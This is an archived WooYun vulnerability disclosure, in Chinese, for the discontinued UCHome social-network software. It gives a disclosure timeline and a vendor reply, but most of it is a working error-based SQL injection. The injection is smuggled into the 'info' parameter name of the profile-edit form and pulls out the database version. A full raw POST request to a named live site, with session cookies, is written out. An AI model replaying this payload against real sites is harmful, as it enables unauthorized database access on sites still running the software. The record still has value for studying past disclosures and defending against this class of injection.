乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-07-21: 细节已通知厂商并且等待厂商处理中 2014-07-22: 厂商已经确认,细节仅向厂商公开 2014-07-25: 细节向第三方安全合作伙伴开放 2014-09-15: 细节向核心白帽子及相关领域专家公开 2014-09-25: 细节向普通白帽子公开 2014-10-05: 细节向实习白帽子公开 2014-10-19: 细节向公众公开
老牌知名程序,今天研究了一下,发现此漏洞(需要登录)
注册用户后,修改个人资料。抓包然后修改如下数据
info[0',0,(select (1) from mysql.user where 1%3d1 and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (version())),1,62)))a from information_schema.tables group by a)b)))#]=aaa
=====================完整HTTP:
POST http://www.aspmpsx.com/cp.php?ac=profile&op=info&ref HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://www.aspmpsx.com/cp.phpAccept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Content-Type: application/x-www-form-urlencodedUA-CPU: AMD64Accept-Encoding: gzip, deflateConnection: Keep-AliveContent-Length: 538Host: www.aspmpsx.comPragma: no-cacheCookie: uchome_auth=7ef14AJ93VMaXgN%2FG8bk93sG%2FMXWJobCrIUN8W88w7hXFUT0lMkQ8EHzs%2FBOTghCbon2OxclXHfvNtMtYF9l; ECS[visit_times]=1; _nitcFirstTime=2014-7-1%2020%3A38%3A2; _nitcReturnTime=2014-7-1%2020%3A38%3A2; prds0[62]=62; n_prds0=13; n_prd0[62]=13; n_prd20[62]=f37516e49abff12a57c8c6f328acd355; bdshare_firstime=1404980017332; uchome_loginuser=admin; uchome__refer=%252Fadmincp.php; uchome_space_top_show=1; uchome_checkpm=1; uchome_sendmail=1name=add%27&marry=1&friend%5Bmarry%5D=0&birthyear=1989&birthmonth=2&birthday=1&friend%5Bbirth%5D=0&blood=A&friend%5Bblood%5D=0&birthprovince=%C7%E0%BA%A3&birthcity=%B5%C2%C1%EE%B9%FE&friend%5Bbirthcity%5D=0&resideprovince=%C7%E0%BA%A3&residecity=%B5%C2%C1%EE%B9%FE&friend%5Bresidecity%5D=0&profilesubmit=%B1%A3%B4%E6&formhash=8fc39a43&info[0',0,(select (1) from mysql.user where 1%3d1 and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (version())),1,62)))a from information_schema.tables group by a)b)))#]=aaa
你们比我懂
危害等级:高
漏洞Rank:20
确认时间:2014-07-22 09:57
uchome 程序已经停止维护,不过还是要感谢您对我们产品的关注,合作愉快。
暂无